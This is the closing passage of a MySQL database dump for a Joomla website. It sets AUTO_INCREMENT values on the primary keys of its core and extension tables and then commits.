ALTER TABLE `y57u5_banners`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_banner_clients`
--
ALTER TABLE `y57u5_banner_clients`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_categories`
--
ALTER TABLE `y57u5_categories`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=39;

--
-- AUTO_INCREMENT for table `y57u5_contact_details`
--
ALTER TABLE `y57u5_contact_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `y57u5_content`
--
ALTER TABLE `y57u5_content`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=131;

--
-- AUTO_INCREMENT for table `y57u5_content_types`
--
ALTER TABLE `y57u5_content_types`
  MODIFY `type_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=16;

--
-- AUTO_INCREMENT for table `y57u5_convertforms`
--
ALTER TABLE `y57u5_convertforms`
  MODIFY `id` int(10) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `y57u5_convertforms_campaigns`
--
ALTER TABLE `y57u5_convertforms_campaigns`
  MODIFY `id` int(10) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `y57u5_convertforms_conversions`
--
ALTER TABLE `y57u5_convertforms_conversions`
  MODIFY `id` int(10) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=805;

--
-- AUTO_INCREMENT for table `y57u5_corejoomla_countries`
--
ALTER TABLE `y57u5_corejoomla_countries`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=258;

--
-- AUTO_INCREMENT for table `y57u5_corejoomla_messagequeue`
--
ALTER TABLE `y57u5_corejoomla_messagequeue`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_corejoomla_messages`
--
ALTER TABLE `y57u5_corejoomla_messages`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_corejoomla_rating_details`
--
ALTER TABLE `y57u5_corejoomla_rating_details`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_extensions`
--
ALTER TABLE `y57u5_extensions`
  MODIFY `extension_id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10569;

--
-- AUTO_INCREMENT for table `y57u5_fields`
--
ALTER TABLE `y57u5_fields`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_fields_groups`
--
ALTER TABLE `y57u5_fields_groups`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_finder_filters`
--
ALTER TABLE `y57u5_finder_filters`
  MODIFY `filter_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_finder_links`
--
ALTER TABLE `y57u5_finder_links`
  MODIFY `link_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=309;

--
-- AUTO_INCREMENT for table `y57u5_finder_taxonomy`
--
ALTER TABLE `y57u5_finder_taxonomy`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=45;

--
-- AUTO_INCREMENT for table `y57u5_finder_terms`
--
ALTER TABLE `y57u5_finder_terms`
  MODIFY `term_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=328958;

--
-- AUTO_INCREMENT for table `y57u5_finder_types`
--
ALTER TABLE `y57u5_finder_types`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=8;

--
-- AUTO_INCREMENT for table `y57u5_jevents_catmap`
--
ALTER TABLE `y57u5_jevents_catmap`
  MODIFY `evid` int(12) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `y57u5_jevents_exception`
--
ALTER TABLE `y57u5_jevents_exception`
  MODIFY `ex_id` int(12) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_jevents_filtermap`
--
ALTER TABLE `y57u5_jevents_filtermap`
  MODIFY `fid` int(12) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_jevents_icsfile`
--
ALTER TABLE `y57u5_jevents_icsfile`
  MODIFY `ics_id` int(12) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `y57u5_jevents_repetition`
--
ALTER TABLE `y57u5_jevents_repetition`
  MODIFY `rp_id` int(12) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=32;

--
-- AUTO_INCREMENT for table `y57u5_jevents_rrule`
--
ALTER TABLE `y57u5_jevents_rrule`
  MODIFY `rr_id` int(12) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=13;

--
-- AUTO_INCREMENT for table `y57u5_jevents_translation`
--
ALTER TABLE `y57u5_jevents_translation`
  MODIFY `translation_id` int(12) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_jevents_vevdetail`
--
ALTER TABLE `y57u5_jevents_vevdetail`
  MODIFY `evdet_id` int(12) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=13;

--
-- AUTO_INCREMENT for table `y57u5_jevents_vevent`
--
ALTER TABLE `y57u5_jevents_vevent`
  MODIFY `ev_id` int(12) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=13;

--
-- AUTO_INCREMENT for table `y57u5_jev_defaults`
--
ALTER TABLE `y57u5_jev_defaults`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `y57u5_jev_users`
--
ALTER TABLE `y57u5_jev_users`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_jlexblock`
--
ALTER TABLE `y57u5_jlexblock`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=21;

--
-- AUTO_INCREMENT for table `y57u5_joomailermailchimpintegration`
--
ALTER TABLE `y57u5_joomailermailchimpintegration`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=679;

--
-- AUTO_INCREMENT for table `y57u5_joomailermailchimpintegration_campaigns`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_campaigns`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_joomailermailchimpintegration_crm`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_crm`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_joomailermailchimpintegration_crm_users`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_crm_users`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_joomailermailchimpintegration_custom_fields`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_custom_fields`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_joomailermailchimpintegration_misc`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_misc`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_joomailermailchimpintegration_signup`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_signup`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_jumi`
--
ALTER TABLE `y57u5_jumi`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=13;

--
-- AUTO_INCREMENT for table `y57u5_k2_attachments`
--
ALTER TABLE `y57u5_k2_attachments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_k2_categories`
--
ALTER TABLE `y57u5_k2_categories`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7;

--
-- AUTO_INCREMENT for table `y57u5_k2_comments`
--
ALTER TABLE `y57u5_k2_comments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=214;

--
-- AUTO_INCREMENT for table `y57u5_k2_extra_fields`
--
ALTER TABLE `y57u5_k2_extra_fields`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `y57u5_k2_extra_fields_groups`
--
ALTER TABLE `y57u5_k2_extra_fields_groups`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `y57u5_k2_items`
--
ALTER TABLE `y57u5_k2_items`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=64;

--
-- AUTO_INCREMENT for table `y57u5_k2_tags`
--
ALTER TABLE `y57u5_k2_tags`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=32;

--
-- AUTO_INCREMENT for table `y57u5_k2_tags_xref`
--
ALTER TABLE `y57u5_k2_tags_xref`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=344;

--
-- AUTO_INCREMENT for table `y57u5_k2_users`
--
ALTER TABLE `y57u5_k2_users`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=9;

--
-- AUTO_INCREMENT for table `y57u5_k2_user_groups`
--
ALTER TABLE `y57u5_k2_user_groups`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `y57u5_languages`
--
ALTER TABLE `y57u5_languages`
  MODIFY `lang_id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `y57u5_menu`
--
ALTER TABLE `y57u5_menu`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1169;

--
-- AUTO_INCREMENT for table `y57u5_menu_types`
--
ALTER TABLE `y57u5_menu_types`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=15;

--
-- AUTO_INCREMENT for table `y57u5_messages`
--
ALTER TABLE `y57u5_messages`
  MODIFY `message_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_modules`
--
ALTER TABLE `y57u5_modules`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=435;

--
-- AUTO_INCREMENT for table `y57u5_newsfeeds`
--
ALTER TABLE `y57u5_newsfeeds`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_overrider`
--
ALTER TABLE `y57u5_overrider`
  MODIFY `id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key';

--
-- AUTO_INCREMENT for table `y57u5_phocadownload`
--
ALTER TABLE `y57u5_phocadownload`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=43;

--
-- AUTO_INCREMENT for table `y57u5_phocadownload_categories`
--
ALTER TABLE `y57u5_phocadownload_categories`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `y57u5_phocadownload_file_votes`
--
ALTER TABLE `y57u5_phocadownload_file_votes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_phocadownload_file_votes_statistics`
--
ALTER TABLE `y57u5_phocadownload_file_votes_statistics`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_phocadownload_layout`
--
ALTER TABLE `y57u5_phocadownload_layout`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `y57u5_phocadownload_licenses`
--
ALTER TABLE `y57u5_phocadownload_licenses`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_phocadownload_logging`
--
ALTER TABLE `y57u5_phocadownload_logging`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_phocadownload_styles`
--
ALTER TABLE `y57u5_phocadownload_styles`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7;

--
-- AUTO_INCREMENT for table `y57u5_phocadownload_tags`
--
ALTER TABLE `y57u5_phocadownload_tags`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_phocadownload_tags_ref`
--
ALTER TABLE `y57u5_phocadownload_tags_ref`
  MODIFY `id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_phocadownload_user_stat`
--
ALTER TABLE `y57u5_phocadownload_user_stat`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=43;

--
-- AUTO_INCREMENT for table `y57u5_postinstall_messages`
--
ALTER TABLE `y57u5_postinstall_messages`
  MODIFY `postinstall_message_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=12;

--
-- AUTO_INCREMENT for table `y57u5_privacy_consents`
--
ALTER TABLE `y57u5_privacy_consents`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_privacy_requests`
--
ALTER TABLE `y57u5_privacy_requests`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_redirect_links`
--
ALTER TABLE `y57u5_redirect_links`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=11361;

--
-- AUTO_INCREMENT for table `y57u5_rokcandy`
--
ALTER TABLE `y57u5_rokcandy`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=198;

--
-- AUTO_INCREMENT for table `y57u5_rokcommon_configs`
--
ALTER TABLE `y57u5_rokcommon_configs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=61;

--
-- AUTO_INCREMENT for table `y57u5_roksprocket_items`
--
ALTER TABLE `y57u5_roksprocket_items`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1591;

--
-- AUTO_INCREMENT for table `y57u5_rstbox`
--
ALTER TABLE `y57u5_rstbox`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `y57u5_rstbox_logs`
--
ALTER TABLE `y57u5_rstbox_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=95753;

--
-- AUTO_INCREMENT for table `y57u5_sj_newsletter_email`
--
ALTER TABLE `y57u5_sj_newsletter_email`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=30;

--
-- AUTO_INCREMENT for table `y57u5_sj_newsletter_email_content`
--
ALTER TABLE `y57u5_sj_newsletter_email_content`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_sj_newsletter_email_content_id`
--
ALTER TABLE `y57u5_sj_newsletter_email_content_id`
  MODIFY `id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `y57u5_tags`
--
ALTER TABLE `y57u5_tags`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=15;

--
-- AUTO_INCREMENT for table `y57u5_template_styles`
--
ALTER TABLE `y57u5_template_styles`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=32;

--
-- AUTO_INCREMENT for table `y57u5_ucm_content`
--
ALTER TABLE `y57u5_ucm_content`
  MODIFY `core_content_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_ucm_history`
--
ALTER TABLE `y57u5_ucm_history`
  MODIFY `version_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_updates`
--
ALTER TABLE `y57u5_updates`
  MODIFY `update_id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2301;

--
-- AUTO_INCREMENT for table `y57u5_update_sites`
--
ALTER TABLE `y57u5_update_sites`
  MODIFY `update_site_id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=20;

--
-- AUTO_INCREMENT for table `y57u5_usergroups`
--
ALTER TABLE `y57u5_usergroups`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', AUTO_INCREMENT=10;

--
-- AUTO_INCREMENT for table `y57u5_users`
--
ALTER TABLE `y57u5_users`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=202;

--
-- AUTO_INCREMENT for table `y57u5_user_keys`
--
ALTER TABLE `y57u5_user_keys`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_user_notes`
--
ALTER TABLE `y57u5_user_notes`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_viewlevels`
--
ALTER TABLE `y57u5_viewlevels`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', AUTO_INCREMENT=7;

--
-- AUTO_INCREMENT for table `y57u5_wf_profiles`
--
ALTER TABLE `y57u5_wf_profiles`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `y57u5_widgetkit_widget`
--
ALTER TABLE `y57u5_widgetkit_widget`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=25;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;